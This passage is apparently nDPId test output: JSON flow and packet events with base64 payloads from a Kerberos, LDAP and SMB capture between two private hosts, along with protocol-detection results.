-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} -00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"} 
-00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"} -00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="} -00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="} 
-00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 
-00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 
